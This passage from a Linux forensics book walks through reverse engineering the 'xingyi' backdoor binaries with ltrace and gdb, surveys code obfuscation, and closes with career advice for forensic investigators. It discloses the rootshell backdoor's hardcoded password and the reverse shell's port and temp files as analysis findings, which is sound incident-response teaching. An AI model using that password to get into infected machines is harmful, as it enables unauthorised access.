FIGURE 10.24

Running ltrace against xingyi_rootshell with the correct password supplied.

The results of running ltrace against xingyi_reverse_shell 127.0.0.1 are shown in Figure 10.25. We can see the C library is loaded, the string length of "127.0.0.1" is checked repeatedly, fork is called creating process 3116, and two warnings are printed before the program exits when Control-C is pressed. A new process listening on port 7777 has been created.

FIGURE 10.25
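String arguments are often the most revealing part of ltrace output, as the password comparison above shows. The following sketch collects every quoted string from saved ltrace output. It assumes each call is printed on one line with string arguments in double quotes. The function names and the sample lines are hypothetical and only modeled on the calls described in the text.

```python
import re

# Double-quoted string literals, allowing backslash-escaped characters inside.
QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')


def string_arguments(ltrace_line):
    """Return the quoted string literals that appear in one ltrace output line."""
    return QUOTED_RE.findall(ltrace_line)


def interesting_strings(lines):
    """Collect unique, non-empty strings in order of first appearance."""
    seen = []
    for line in lines:
        for text in string_arguments(line):
            if text and text not in seen:
                seen.append(text)
    return seen


if __name__ == "__main__":
    # Hypothetical sample lines for illustration.
    sample = [
        'strcmp("sw0rdm4n", "sw0rdm4n") = 0',
        'strlen("127.0.0.1") = 9',
    ]
    print(interesting_strings(sample))
```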

At this point we have enough information about these binaries to say that they are malicious. We know that they create listening sockets, shells, and have other common malware traits. If we want to learn more, it is time to use a debugger.

Using the GNU Debugger for reverse engineering

The GNU debugger, gdb, is the standard debugger for Linux programmers. It is very powerful. Unfortunately, all this power comes with a bit of a learning curve. There are some Graphical User Interface (GUI) front ends to gdb, but the tool is command line based. I will only hit the highlights in this book. For a full course on how to get the most from gdb, I recommend the GNU Debugger Megaprimer at PentesterAcademy.com (http://www.pentesteracademy.com/course?id=4).

Before we get started, I feel that I should point out that gdb was not designed to be used for reverse engineering. There are other debuggers tailor-made for reverse engineering. Of these, IDA Pro is perhaps the most popular. With pricing that starts in excess of US$1100, IDA Pro is not for the casual reverse engineer, however.

To load a program into gdb, simply type gdb <executable>. You should see some messages about your file, concerning whether or not it contained debugging symbols (most files you examine likely lack the extra debugging information), a statement that says to type "help" to get help, and then a (gdb) prompt. Typing help leads to the screen shown in Figure 10.26.

FIGURE 10.26

The gdb main help screen.

If you type help info in gdb, you will get a long list of things that the debugger will report on. One of these items is functions. Running info functions with xingyi_bindshell loaded in the debugger produces a long list, some of which is shown in Figure 10.27. Functions are displayed along with their addresses. Incidentally, gdb commands can be abbreviated as long as they are not ambiguous. Typing inf fun would have returned the same results.

FIGURE 10.27

Partial results from running info functions in gdb.

As mentioned previously, gdb can be used to disassemble a program. The command for disassembling a function is just disassemble <function name or address>, e.g. disassemble main. The command can be shortened to disas. Before running this command, you might wish to switch from the default AT&T syntax to the more common Intel syntax. To do so, issue the command set disassembly-flavor intel. Partial results from disassembling main are shown in Figure 10.28. Note that, unlike the output from objdump shown in Figure 10.15, the main function ends at 0x401312.

FIGURE 10.28

Partial results from disassembling main in gdb.

If, after viewing the disassembly of various functions, you decide to run the program (in your sandbox!), you may wish to set at least one breakpoint. The command to set a breakpoint is simply break <address or function name>. If you supply a function name, the breakpoint is set at the beginning of the function. The command info break lists breakpoints. To delete a breakpoint, type delete <breakpoint number>. The run command will start the program and run everything up to the first breakpoint (if it exists). Typing disassemble with no name or address after it will disassemble the code around the current execution point. These commands are illustrated in Figure 10.29.

FIGURE 10.29

Breakpoint management commands.

If you are stopped at a breakpoint, you can take off running again to the next breakpoint, if any, with continue. You may also use stepi and nexti to execute the next Assembly instruction and to execute the next Assembly instruction while stepping over any functions encountered, respectively. When stepping through a program, you can just hit the <enter> key, as this causes gdb to repeat the last command. The use of these stepping functions is demonstrated in Figure 10.30.

FIGURE 10.30

Using stepping functions in gdb.

As you are tracing through a program, you might want to examine different chunks of memory (especially the stack) and various registers. The x (examine) command is used for this purpose. The help for x and the first twenty giant values (8 bytes) on the stack in hexadecimal (gdb command x/20xg $rsp) are shown in Figure 10.31. Note that because the stack grows downward, it is much easier to display in the debugger.

FIGURE 10.31

Using the examine command in gdb.
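To see what the g (giant) size in x/20xg means at the byte level, the sketch below decodes raw bytes into 8-byte values the way the debugger presents them on a little-endian x86-64 system. The function name giant_words and the sample bytes are hypothetical and are not taken from the figure.

```python
import struct


def giant_words(memory, count):
    """Decode `count` little-endian 8-byte values from the start of `memory`."""
    values = struct.unpack("<%dQ" % count, memory[: 8 * count])
    return ["0x%016x" % value for value in values]


if __name__ == "__main__":
    # Hypothetical 16 bytes of stack memory, lowest address first.
    raw = bytes.fromhex("1213400000000000" "0100000000000000")
    for offset, word in zip(range(0, 16, 8), giant_words(raw, 2)):
        print("rsp+0x%02x: %s" % (offset, word))
```

Because the least significant byte is stored first, the bytes 12 13 40 00 00 00 00 00 are displayed as the single value 0x0000000000401312.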

The command info registers displays all the registers, as shown in Figure 10.32. Note that if you are running a 32-bit executable, the registers will be named EXX, not RXX, as described earlier in this chapter. For reverse engineering, the RBP, RSP, and RIP (base, stack, and instruction pointers, respectively) are the most important.

FIGURE 10.32

Examining registers in gdb.

Let's turn our focus to xingyi_rootshell, now that we have learned some of the basics of using gdb. First, we load the program with gdb xingyi_rootshell. Next, we set a breakpoint at the start of main by typing break main. If you prefer Intel syntax, issue the command set disassembly-flavor intel. To run the program with command line argument(s), append the argument(s) to the run command, e.g. run sw0rdm4n. This sequence of instructions is shown in Figure 10.33.

FIGURE 10.33

Running xingyi_rootshell in gdb.
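When the same opening sequence is repeated for several binaries, the commands can be collected in a gdb command file instead of being typed each time. The following sketch generates such a file. The function name gdb_script is hypothetical; the gdb commands themselves are the ones introduced above.

```python
def gdb_script(arguments, flavor="intel", breakpoint="main"):
    """Return the text of a gdb command file for the session described above."""
    lines = [
        "set disassembly-flavor %s" % flavor,
        "break %s" % breakpoint,
        "run %s" % " ".join(arguments),
        "disassemble",
        "info registers",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Print the command file; redirect the output to a file to save it.
    print(gdb_script(["sw0rdm4n"]), end="")
```

If the output is saved as, say, rootshell.gdb, it can be replayed inside the sandbox with gdb -batch -x rootshell.gdb xingyi_rootshell. In batch mode gdb exits when the commands are finished, so this is best suited to capturing an initial disassembly and register dump rather than to interactive stepping.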

Running disassemble results in the disassembly of the current function, complete with a pointer to the next instruction to be executed. The disassembly of main is shown in Figure 10.34. There are a few things that are readily apparent in this snippet. Thirty-two bytes (0x20) of space are allocated on the stack for local variables. Memory is then allocated on the heap with a call to n_malloc. Two addresses (one from the stack and one inside the program) are loaded into RAX and RDX, and then strcmp is used to compare the two strings stored at these locations. Of significance here is that this snippet makes it clear this embedded string is some sort of password.

FIGURE 10.34

Disassembly of the xingyi_rootshell main function.

If we did not yet realize that this embedded value was a password, we could use the command x/s *0x6010d0 to display this password as shown in Figure 10.35. Note that this is extra easy because the binary was not stripped and had a descriptive name for this variable. Even if it had been stripped, the fact that an address is referenced relative to RIP indicates a variable that is embedded in the program binary. We see that the argument to the system function call is loaded from address 0x400B9C. If we examine this with x/s 0x400b9c, we see that a bash shell is being started.

FIGURE 10.35

Using gdb to determine the program password and the target of the system function call.

What about the xingyi_reverse_shell? We can do a quick analysis by following the same procedure. First, we load it in gdb with gdb xingyi_reverse_shell. Next, we set a breakpoint in main with break main. Optionally, we set the disassembly flavor to Intel with set disassembly-flavor intel. We can run the program with a parameter using run 127.0.0.1. At this stage, the program should be stopped just inside of the main function, and typing disassemble will produce the output shown in Figure 10.36.

FIGURE 10.36

Disassembling main from xingyi_reverse_shell in gdb.

Breaking down the disassembly in Figure 10.36, we can see that this function is fairly simple. Thirty-two (0x20) bytes of space are allocated on the stack. The number of command line parameters and the address of the parameter list are stored in [RBP-0x14] and [RBP-0x20], respectively. If the number of command line parameters is greater than 1 (recall that the program name is counted here), then we jump over the line call <_print_usage>. The address of the second command line argument (located at the start of this list + 0x8 to skip the 8-byte pointer for the first argument) is loaded into RDI and validate_ipv4_octet is called. If we did not already know that this command line parameter was supposed to be an IP address, this code snippet would help us figure it out. Again, if the binary had been stripped, we would need to work a little harder and investigate the function at 0x400AC5 to figure out what it does. If this function doesn't return success, _print_usage is called.

Assuming everything is still good, the daemonize function is called. Once again, if the binary had been stripped of this descriptive name, we would have to work a bit harder and delve into the daemonize function to determine its purpose. We see another address referenced relative to RIP. Here a parameter for _writepid_to_file is being loaded from address 0x6020B8. Running the command x/s *0x6020b8 reveals this string to be "/tmp/xingyi_reverse_pid". This and the remainder of the disassembly of main are shown in Figure 10.37.

FIGURE 10.37

Second half of the disassembly of main in xingyi_reverse_shell.

We can see that fwrite is called a couple of times and that _log_file is also called. If we examine the values referenced in Figure 10.37, we will see that 0x6020B0 contains the value 0x1E61 (7777) and 0x6020C8 contains the string "/tmp/xingyi_reverse.port". It was fairly easy to determine what these three binaries do because the author made no attempt to obfuscate the code. The filenames, function names, variable names, etc. made this process easy. What if a malware author is trying to make things hard to detect and/or understand?

OBFUSCATION

There are a number of methods malware authors will use in order to obfuscate their programs. The level of sophistication varies widely. One of the most pedestrian ways to slow down the reverse engineer is to use a packer. A packer can be utilized to compress a binary on disk and, in some cases, speed up the loading process. A packer compresses an existing program, and then inserts executable code to reverse the process and uncompress the program into memory.

The Ultimate Packer for Executables (UPX) is a very popular cross-platform packer available at http://upx.sourceforge.net. If executing the command grep UPX <file> generates any hits, then you might be dealing with a file packed by UPX. If you get a hit, download the UPX package and decompress the file with the -d option. The first bytes in a file packed with UPX are shown in Figure 10.38.

FIGURE 10.38

The first part of a file packed with UPX.
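The same check can be scripted when you have a directory full of unknown binaries to triage. The sketch below is a rough Python equivalent of the grep command above. The function name looks_upx_packed is hypothetical, and the whole file is read into memory, which assumes the binaries are reasonably small.

```python
import sys


def looks_upx_packed(path, marker=b"UPX"):
    """Return True if the marker bytes occur anywhere in the file."""
    with open(path, "rb") as handle:
        return marker in handle.read()


if __name__ == "__main__":
    # Usage: python upxcheck.py <file> [<file> ...]
    for name in sys.argv[1:]:
        verdict = "possible UPX" if looks_upx_packed(name) else "no UPX marker"
        print("%s: %s" % (name, verdict))
```

As with grep, a hit only suggests that UPX may have been used. The string can appear in unpacked files too, and a packed file can have the marker altered, so treat the result as a lead rather than proof.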

In the past, clever malware authors might have written self-modifying code that changes as it is executed. This was quite easily done with DOS systems that had no memory protection whatsoever. In the modern world, even Windows will mark executable memory blocks as read-only, making this obfuscation method a thing of the past.

Modern day compilers benefit from decades of research and do a great job of optimizing code. Optimized code is also very uniform, which allows it to be more easily reverse engineered. As a result, obfuscated code is likely handwritten in Assembly. This is both good and bad. The good thing is that you have to be a skilled Assembly coder to write malware this way. The bad thing is that you have to be a skilled Assembly coder to interpret and follow the code! Again, for the purposes of incident response, if you encounter code using the obfuscation techniques discussed in this section, it is probably malware. There are some paranoid companies that obfuscate their products in order to discourage reverse engineering, but those products are few and far between on the Linux platform.

So what sorts of things might one do to obfuscate Assembly code? How about using obscure Assembly instructions? In this chapter, we have covered just a handful of Assembly instructions. Yet this is enough to get a high-level view of what is happening in most programs. Start using uncommon operations, and even experienced Assembly coders are running to Google and their reference manuals.

Compilers are smart enough to replace calculations involving only constants with the answers. For example, if I want to set a flag in position 18 in a bit vector, and I write x = 2^17 (two to the seventeenth power) or x = 1 << 17, this will be replaced with x = 0x20000. If you see calculations involving only constants that are known at compile time, suspect obfuscation (or poorly written Assembly).
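The arithmetic is easy to check, and Python's own compiler can be used to observe the same kind of constant folding. This is only an illustration in Python rather than compiled C, and the variable names are hypothetical. Note that ^ means exclusive-or in both C and Python, so the power form is written 2 ** 17 here.

```python
import dis

# Three ways of writing "bit 17 set" that all denote the same constant.
FLAG_SHIFT = 1 << 17
FLAG_POWER = 2 ** 17
FLAG_HEX = 0x20000

if __name__ == "__main__":
    print(FLAG_SHIFT == FLAG_POWER == FLAG_HEX)
    # Show the bytecode CPython generates for the shift expression. On
    # recent versions the constant is typically precomputed by the compiler
    # rather than calculated at run time.
    dis.dis(compile("x = 1 << 17", "<example>", "exec"))
```

Counting bit positions from one, bit 17 (counting from zero) is the eighteenth position, which is why the text speaks of position 18.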

Authors may also intentionally insert dead code that is never called in order to throw the reverse engineer off track. I once worked for a company that had written their PC software product in COBOL (yes, I was desperate for a job when I took that one). The primary author of their main product had inserted thousands of lines of COBOL that did absolutely nothing. I discovered this when I ported the program to C++. Incidentally, the complete COBOL listing required an entire box of paper. The C++ program was less than 200 pages long, despite running on three operating systems in graphical or console mode (the old program was DOS and console only).

Authors might also insert several lines of code that are easily replaced by a single line. One of the techniques is to employ an intermediate variable in every calculation even when this is unnecessary. Another trick is to use mathematical identities when making assignments.
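The last two tricks can be illustrated with a small example. The sketch below is a hypothetical illustration, not code from any real malware sample. It replaces a simple addition with a version that uses needless intermediate variables and the identity a + b = (a XOR b) + 2 * (a AND b).

```python
def add_plain(a, b):
    """The straightforward version: one line."""
    return a + b


def add_obfuscated(a, b):
    """Same result, using the identity a + b == (a ^ b) + 2 * (a & b)."""
    carry_free = a ^ b        # bits where exactly one input is set
    carries = a & b           # bits where both inputs are set
    doubled = carries << 1    # each shared bit contributes twice its value
    total = carry_free + doubled
    return total


if __name__ == "__main__":
    print(add_plain(1234, 4321), add_obfuscated(1234, 4321))
```

Both functions return the same value for any pair of integers, yet the second takes noticeably longer to recognize as a plain addition when it is read as disassembly.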

One of the few techniques that still works when programming in a high level language is function inlining. If you look back in this chapter, you will see that a lot of the information we gleaned from our unknown binaries was based on tracing through what functions were called locally (looking at disassembly), in libraries (ltrace), and system calls (strace). Inlining turns a program into one big function. The one big function will still have library and system calls but will be noticeably harder to grasp.

SUMMARY

In this chapter we discussed how to determine if unknown files are malicious. We even covered the basics of reverse engineering. With this chapter, we have now covered every major topic in the world of Linux forensics. In the next chapter we will discuss taking Linux forensics to the next level.

CHAPTER 11

The Road Ahead

INFORMATION IN THIS CHAPTER:

Next steps
Communities
Learning more
Congregate
Certify?

NOW WHAT?

You've read through this entire book and worked through the sample images. Now what? The world of information security is a big place. The subfield of forensics is also vast. While we have covered everything you need to know for a typical Linux incident response, we have only scratched the surface of forensics knowledge. Perhaps you have done a handful of real Linux investigations. A natural question to ask is, "Where do I go from here?"

COMMUNITIES

Do not work alone. Become part of a community. If you want to limit yourself strictly to forensics, this is easier said than done. Organizations dedicated to forensics with a vibrant network of local chapters are rare. Personally, I do not see this as a bad thing. I think it is far better to get plugged in to the broader information security community. If you think about it, having friends that are experts on things like offensive security could be helpful to you in the future. You will also find many domain experts on Linux, Assembly, etc. in this community.

A good starting place might be a local DEFCON group. The list of groups (named according to phone area codes) can be found at https://www.defcon.org/html/defcon-groups/dc-groups-index.html. If you live in a large city, you might find that there is a DEFCON group in your area. What if you don't live in a big city? E-mail the contact people from some nearby groups and ask if they know of anything going on in your area, especially anything related to forensics.

Local meetings are great. You can meet like-minded people, and often such meetings can be fun. The problem with these meetings is that they tend to be infrequent. Even monthly meetings are not enough interaction with the bigger community. This is where online communities can be extremely beneficial. When you join an online community, you have access to many experts around the world, not just people who live nearby.

A great online community to become a part of is the one at Pentester Academy (http://pentesteracademy.com). Pentester Academy goes beyond a couple of discussion forums by providing downloads related to this book and others published by their publication branch, author interaction, and a growing library of courses. Another plus of Pentester Academy is that it is not narrowly focused on the subfield of forensics.

If you are only looking for a place to have forensics discussions, you might consider giving Computer Forensics World (http://computerforensicsworld.com) a try. They offer a number of discussion forums. There is also a computer forensics community on Reddit (http://reddit.com/r/computerforensics).

LEARNING MORE

Has this book and/or a few Linux forensics investigations inspired you to learn more? You can never go wrong learning more about the fundamentals. Here is my list of fundamentals every forensics person should know:

Linux – this is the place for doing forensics, even if the subject is not running Linux
Python – this has become the de facto standard for information security people
Shell scripting – sometimes Python is overkill or has too much overhead
Assembly – a good understanding of Assembly helps you understand everything

What is the best way to learn Linux? Use it. Really use it. Run it every day as your primary operating system. Do not just run a live Linux distribution occasionally. Install Linux on your laptop. You will never learn about Linux administration from a live Linux distribution. Personally, I would stay away from a forensics-specific distribution, like SIFT. You will be much better off in the long run installing a standard version of Linux and then adding your tools. If you are not sure what to use, some member of the Ubuntu family is a good choice as there is a large community to which to turn when you want support. If, after running Linux for a few years, you decide you really want to learn Linux on a deeper level, consider installing Gentoo Linux (http://gentoo.org) on something other than your forensics workstation. Gentoo is a source-based distribution, and installing it can be simultaneously educational and extremely frustrating.

As with Linux, the best way to learn Python is to really use it. There are many books available that claim to teach you Python. The first thing you should realize is that Python can be used as a scripting language or as a programming language. Most of the books available treat Python as a programming language. What I mean by programming language is a language for writing large computer programs (say a word processor or a game). In my opinion, there are other languages that are better suited for such tasks.

To learn Python scripting requires a very hands-on approach. This is exactly what you will find in the Python course at Pentester Academy (http://www.pentesteracademy.com/course?id=1). Some might question this recommendation, given that this book is published by Pentester Academy. I had been recommending this course long before I produced my first video for Pentester Academy or there was even a notion of this book, however. Some other good resources include http://learnpythonthehardway.org, http://www.codecademy.com/en/tracks/python, and http://learnpython.org.

As much as I might like Python, there are times when shell scripting is more appropriate. In general, when you primarily want to run some programs and/or do not need to do a lot of calculations, a shell script can be a good choice. Some online resources for learning shell scripting include http://linuxcommand.org, http://linuxconfig.org/bash-scripting-tutorial, and http://tldp.org/HOWTO/Bash-Prog-Intro-HOWTO.html. Two books on shell scripting that I would recommend are Wicked Cool Shell Scripts by Dave Taylor (2nd edition scheduled for September 2015 publication) and Classic Shell Scripting by Arnold Robbins and Nelson H. F. Beebe. The latter was published in 2005 but is still one of the best books available on this topic.

Why learn Assembly? A firm grasp of Assembly helps a person understand how computers work at the lowest level. Assembly is to computer science what calculus is to mathematics and physics. Just as knowing calculus allows you to instantly make sense of everything from your high school physics class, learning Assembly will make what goes on behind the scenes with high-level programming languages (C, C++, etc.) crystal clear.

Pentester Academy offers two courses on Assembly and shellcoding. One is for 32-bit systems and the other is for 64-bit operating systems. The 32-bit and 64-bit courses are available at http://www.pentesteracademy.com/course?id=3 and http://www.pentesteracademy.com/course?id=7, respectively. Both of these courses will provide you with a basic understanding of Assembly and go well beyond what has been covered in this book.

If you want to delve deeper into Assembly and explore topics not covered in the Pentester Academy courses mentioned above, you might enjoy Modern X86 Assembly Language Programming by Daniel Kusswurm. This book covers many topics that are not covered by the Pentester Academy courses (as these courses are focused on things used in shellcoding and reverse engineering malware). The additional topics include items such as using floating-point registers and Advanced Vector Extensions (AVX) found in new processors.

CONGREGATE

Being part of vibrant local and online communities is a great thing. Nothing beats a great conference, however. Many of the research projects I have done in the past have been a direct result of people I have met and discussions I have had at conferences around the world. Conferences are a great place to network and meet people with complementary skill sets and areas of expertise.

A good starter list of forensics conferences can be found at http://forensicswiki.org/wiki/Upcoming_events#Conferences. Forensics Magazine lists some conferences as well at http://www.forensicmag.com/events. I have not found a good master list for digital forensics conferences. You might wish to try a few Google searches to locate conferences dedicated to forensics.

There are many excellent information security conferences out there that offer something for people interested in forensics. My two favorite places to find conference listings are Concise Courses (http://concise-courses.com/security) and SECurity Organizer and Reporter Exchange (http://secore.info). SECore offers a call for papers listing with CFP closing dates for various conferences, which can be handy if you have something exciting to share with others.

Now that you have found a few conferences to attend, what should you do while you are there? Participate! If there is a forensics competition, and you have the time, consider competing. You might not win, but you are virtually guaranteed to learn a lot. Often there are people who will offer a little coaching for beginners in these competitions. Ask questions. Do not be afraid to talk to conference presenters. With very few exceptions, most are approachable and happy to talk more about their research.

Intentionally meet new people. Even if you traveled to a conference with a group, find someone you do not know with whom to have a meal at the conference. Overcome any natural tendencies toward introversion. I have attended a lot of conferences. I have yet to have a negative outcome from introducing myself and sitting with someone new over lunch. If the conference offers any mixers or networking events, attend them if at all possible. It does not take long to build a network of people whom you can leverage in a future investigation.

Now for the hardest thing to do at conferences: share. Many people falsely assume they have nothing worth sharing because they are new to information security and/or forensics. Everyone is an expert in something. Find an area you enjoy and become an expert in that area. Share your expertise with others. You will quickly find that explaining things to others enriches your own understanding.

Submitting a talk to a conference can be intimidating. Everyone gets rejected from conferences. The key is not to take it personally. A rejected talk may be more of an indicator of poor fit with a theme or other talks offered than a reflection of the quality of your submission. Many conferences will give you feedback that includes suggestions for future submissions.

Regional conferences, such as B-sides, can be a good place to start your career as a conference presenter. I'm not saying do not submit to the big conferences like DEFCON. If you feel comfortable addressing a few thousand people for your very first conference presentation, then go right ahead. If you find public speaking a bit frightening, you might want to start with a conference small enough that you will have fewer than a hundred people in the room during your talk.

CERTIFY

Generally speaking, certifications can help you get a job. This is especially true for individuals just getting started in a career. Unfortunately, many of the recognized certifications require a certain level of experience that those just starting out do not yet possess. The situation is even worse in the forensics field as some certification organizations require active full-time employment with a government entity. To further complicate things, there is no universally accepted certification in digital forensics.

In the broader field of information security, the Certified Information Systems Security Professional (CISSP) from the International Information System Security Certification Consortium, (ISC)², is considered to be the standard certification all practitioners should hold in many countries, including the United States. (ISC)² offers a Certified Cyber Forensics Professional (CCFP) certification. Unlike the CISSP, the CCFP is not considered essential by many organizations. As with the CISSP, if you want to be a CCFP but you lack experience, you can take the test and become an Associate of (ISC)² who is granted the certification later, after you have obtained the required experience.

Many of the forensics certifications that are not tied to government employment are issued by vendors. Given the open source nature of Linux, certifications specific to Linux forensics appear to be non-existent at this time. The net of all of this is that you should be cautious about spending money on forensics certifications unless you know they will be required for a specific job.

SUMMARY

We have covered a lot of ground in this book. I hope you have enjoyed the journey. We have laid a foundation that should help you perform investigations of Linux systems. What may not be immediately apparent is that by learning how to do forensics in Linux, you have also learned a considerable amount about how to investigate Windows systems on a Linux-based forensics workstation. That is the subject for another book. Until then, so long for now, and enjoy your Linux investigations.